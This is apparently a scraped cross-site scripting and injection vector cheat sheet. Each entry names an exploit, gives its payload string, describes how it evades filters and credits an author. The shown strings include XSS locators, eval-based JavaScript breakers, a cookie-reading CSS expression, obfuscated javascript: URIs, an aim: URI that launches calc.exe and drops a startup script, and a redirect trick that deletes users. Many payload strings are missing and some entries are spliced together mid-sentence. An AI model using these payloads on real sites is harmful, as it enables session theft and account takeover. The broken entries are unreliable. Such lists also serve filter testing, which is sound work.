Exploit Tags: general, JS breaking, basic, obfuscated, user interaction Author Name: kishor Advanced HTML injection locator Exploit Name: Advanced HTML injection locator Exploit String: 000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s> Exploit Description: This vector indicates HTML injections by stroked text. Exploit Tags: general, html breaking, injection Author Name: .mario Advanced XSS Locator Exploit Name: Advanced XSS Locator Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}alert(6);function xss(){// Exploit Description: Advanced XSS Locator Exploit Tags: general, html breaking, comment breaking, JS breaking Author Name: .mario Advanced XSS Locator for title-Injections Exploit Name: Advanced XSS Locator for title-Injections Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");} Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections. Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking Author Name: .mario aim: uri exploit Exploit Name: aim: uri exploit Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" Exploit Description: This aim-uri executes the calc.exe on vulnerable systems Exploit Tags: URI exploits, gecko, injection, general Author Name: xs-sniper Backslash-obfuscated XBL injection - variant 1 Exploit Name: Backslash-obfuscated XBL injection - variant 1 Exploit String:
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant 2
Exploit Name: Backslash-obfuscated XBL injection - variant 2
Exploit String:
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant 3
Exploit Name: Backslash-obfuscated XBL injection - variant 3
Exploit String:
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant 4
Exploit Name: Backslash-obfuscated XBL injection - variant 4
Exploit String:
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk

Backslash-obfuscated XBL injection - variant 5
Exploit Name: Backslash-obfuscated XBL injection - variant 5
Exploit String:
Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate.
Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated
Author Name: thespanner.co.uk

BASE
Exploit Name: BASE
Exploit String:
Exploit Description: Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths.
If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work Exploit Tags: general, evil tags Author Name: ha.ckers.org Basic back ticked attribute breaker Exploit Name: Basic back ticked attribute breaker Exploit String: `> Exploit Description: This vector breaks back ticked attributes. Exploit Tags: general, html breaking, basic Author Name: kishor Basic double quoted attribute breaker Exploit Name: Basic double quoted attribute breaker Exploit String: > Exploit Description: This vector breaks double quoted attributes and produces an alert. Exploit Tags: general, html breaking Author Name: kishor Basic JS breaker Exploit Name: Basic JS breaker Exploit String: xyz onerror=alert(6); Exploit Description: This vector just fits between script tags and fires an alerts. Exploit Tags: general, JS breaking, basic Author Name: kishor Basic JS breaker variant 1 Exploit Name: Basic JS breaker variant 1 Exploit String: 1;a=eval;b=alert;a(b(/c/.source)); Exploit Description: This vector breaks JS integer assignments. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 2 Exploit Name: Basic JS breaker variant 2 Exploit String: 1];a=eval;b=alert;a(b(17));// Exploit Description: This vector breaks JS integer assignments in arrays. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 3 Exploit Name: Basic JS breaker variant 3 Exploit String: ];a=eval;b=alert;a(b(16));// Exploit Description: This vector breaks JS when placed in double quoted arrays. Exploit Tags: general, JS breaking Author Name: kishor Basic JS breaker variant 4 Exploit Name: Basic JS breaker variant 4 Exploit String: '];a=eval;b=alert;a(b(15));// Exploit Description: This vector breaks JS when embedded in single quoted arrays. 
Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 5 Exploit Name: Basic JS breaker variant 5 Exploit String: 1};a=eval;b=alert;a(b(14));// Exploit Description: JS literal object breaker for integer properties. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 6 Exploit Name: Basic JS breaker variant 6 Exploit String: '};a=eval;b=alert;a(b(13));// Exploit Description: JS breaker for literal objects with single quoted string properties. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 7 Exploit Name: Basic JS breaker variant 7 Exploit String: };a=eval;b=alert;a(b(12));// Exploit Description: JS breaker for literal objects with double quoted string properties. Exploit Tags: general, JS breaking Author Name: kishor Basic JS breaker variant 8 Exploit Name: Basic JS breaker variant 8 Exploit String: a=1;a=eval;b=alert;a(b(11));// Exploit Description: Can be used when JS can be injected directly. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 9 Exploit Name: Basic JS breaker variant 9 Exploit String: ;//%0da=eval;b=alert;a(b(10));// Exploit Description: Breaks double quoted strings, injects a comment, carriage return and finally an alert. Exploit Tags: general, JS breaking, CRLF Author Name: kishor Basic JS breaker variant 10 Exploit Name: Basic JS breaker variant 10 Exploit String: ';//%0da=eval;b=alert;a(b(9));// Exploit Description: Breaks single quoted strings, injects a comment, carriage return and finally an alert. Exploit Tags: general, JS breaking, basic, obfuscated, CRLF Author Name: kishor Basic single quoted attribute breaker Exploit Name: Basic single quoted attribute breaker Exploit String: '> Exploit Description: This vector breaks single quoted attributes and appends an alert. 
Exploit Tags: general, html breaking, basic Author Name: kishor Basic title breaker Exploit Name: Basic title breaker Exploit String: Exploit Description: This basic vector breaks HTML titles and injects JavaScript. Exploit Tags: general, html breaking, basic, title breaking Author Name: kishor BGSOUND Exploit Name: BGSOUND Exploit String: Exploit Description: BGSOUND Exploit Tags: general, evil tags Author Name: ha.ckers.org BODY background-image Exploit Name: BODY background-image Exploit String: Exploit Description: BODY image Exploit Tags: general, evil tags Author Name: ha.ckers.org BODY ONLOAD Exploit Name: BODY ONLOAD Exploit String: Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ” Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. Exploit Tags: general, gecko, obfuscated, evil tags Author Name: t3rmin4t0r Commented-out Block Exploit Name: Commented-out Block Exploit String: Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. Exploit Tags: general, obfuscated, conditional comments, internet explorer Author Name: ha.ckers.org Comment-breaker using obfuscated JavaScript Exploit Name: Comment-breaker using obfuscated JavaScript Exploit String: */a=eval;b=alert;a(b(/e/.source));/* Exploit Description: This vector creates an alert by breaking multiline comments. 
Exploit Tags: general, comment breaking, JS breaking Author Name: kishor Conditional style injection for IE Exploit Name: Conditional style injection for IE Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example. Exploit Tags: general, obfuscated, internet explorer, style injection Author Name: DoctorDan Content Replace Exploit Name: Content Replace Exploit String: XSS Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java&#x09;script:” was converted into ”java script:”. Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org Cookie Manipulation Exploit Name: Cookie Manipulation Exploit String: Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where Exploit Description: Div background-image Exploit Tags: general, evil tags, style injection Author Name: ha.ckers.org DIV background-image 2 Exploit Name: DIV background-image 2 Exploit String:
    Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) Exploit Tags: general, evil tags, style injection Author Name: ha.ckers.org DIV expression Exploit Name: DIV expression Exploit String:
    Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression” Exploit Tags: general, evil tags, style injection, internet explorer Author Name: ha.ckers.org DIV w/Unicode Exploit Name: DIV w/Unicode Exploit String:
    Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org Double open angle brackets Exploit Name: Double open angle brackets Exploit String: Exploit Description: Iframe (If iframes are allowed there are a lot of other XSS problems as well). Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org Image onerror wrapped in XML statement Exploit Name: Image onerror wrapped in XML statement Exploit String: a= %3c%69%6d%67%2f%73%72%63%3d%31 %20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e document.write(unescape(a..b)) Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context. Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags Author Name: .mario Image tag with obfuscated JS URI Exploit Name: Image tag with obfuscated JS URI Exploit String: Exploit Description: This vector creates three image tags with differing CRLF obfuscation in the javascript: URI. Exploit Tags: general, basic, obfuscated, evil tags, internet explorer Author Name: OWASP Image w/CharCode Exploit Name: Image w/CharCode Exploit String: Exploit Description: If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. 
Exploit Tags: general, evil tags, obfuscated, internet explorer Author Name: ha.ckers.org IMG Dynsrc Exploit Name: IMG Dynsrc Exploit String: Exploit Description: IMG Dynsrc Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG Embedded commands 1 Exploit Name: IMG Embedded commands 1 Exploit String: Exploit Description: This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. Exploit Tags: general, evil tags Author Name: ha.ckers.org IMG Embedded commands 2 Exploit Name: IMG Embedded commands 2 Exploit String: Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). 
Exploit Tags: general, redirect Author Name: ha.ckers.org IMG Lowsrc Exploit Name: IMG Lowsrc Exploit String: Exploit Description: IMG Lowsrc Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG No Quotes/Semicolon Exploit Name: IMG No Quotes/Semicolon Exploit String: Exploit Description: No quotes and no semicolon Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG STYLE w/expression Exploit Name: IMG STYLE w/expression Exploit String: exp/* Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG w/JavaScript Directive Exploit Name: IMG w/JavaScript Directive Exploit String: Exploit Description: Image XSS using the JavaScript directive. Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG w/VBscript Exploit Name: IMG w/VBscript Exploit String: Exploit Description: VBscript in an image Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org INPUT Image Exploit Name: INPUT Image Exploit String: Exploit Description: INPUT Image Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IP Encoding Exploit Name: IP Encoding Exploit String: XSS Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). 
Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org JavaScript concatenation vector variant 1 Exploit Name: JavaScript concatenation vector variant 1 Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 Exploit Description: This vector concatenates a string and evaluates it via mapping on URL Exploit Tags: general, internet explorer, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 2 Exploit Name: JavaScript concatenation vector variant 2 Exploit String: s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; Exploit Description: This vector concatenates a string and evaluates it via self-execution. Exploit Tags: general, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 3 Exploit Name: JavaScript concatenation vector variant 3 Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); Exploit Description: This vector concatenates a string and evaluates it via usage of common DOM methods and element creation. Exploit Tags: general, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 4 Exploit Name: JavaScript concatenation vector variant 4 Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. 
Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 5 Exploit Name: JavaScript concatenation vector variant 5 Exploit String: s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 6 Exploit Name: JavaScript concatenation vector variant 6 Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators. Exploit Tags: general, internet explorer, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 7 Exploit Name: JavaScript concatenation vector variant 7 Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a regular string via ternary operators. Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript Includes Exploit Name: JavaScript Includes Exploit String:
    Exploit Description: &JavaScript includes (works in Netscape 4.x). Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org JavaScript Link Location Exploit Name: JavaScript Link Location Exploit String: XSS Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) JavaScript link location Exploit Tags: general, evil tags, obfuscated, redirect Author Name: ha.ckers.org JavaScript-breaker using carriage return Exploit Name: JavaScript-breaker using carriage return Exploit String: %0da=eval;b=alert;a(b(/d/.source)); Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. Exploit Tags: general, JS breaking, CRLF Author Name: kishor JS link with whitespace obfuscation Exploit Name: JS link with whitespace obfuscation Exploit String: test Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. Exploit Tags: general, evil tags, obfuscated Author Name: thespanner.co.uk JS string concatenation breaker Exploit Name: JS string concatenation breaker Exploit String: +alert(0)+ Exploit Description: This can be used when input is concatenated in JavaScript. Exploit Tags: general, JS breaking, basic Author Name: .mario JSON based obfuscated onload vector Exploit Name: JSON based obfuscated onload vector Exploit String: Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM Exploit Tags: general, evil tags, JSON, obfuscated Author Name: thespanner.co.uk JSON based semicolon-onload vector Exploit Name: JSON based semicolon-onload vector Exploit String: Exploit Description: Layer (Older Netscape only) Exploit Tags: general, evil tags Author Name: ha.ckers.org List-style-image Exploit Name: List-style-image Exploit String: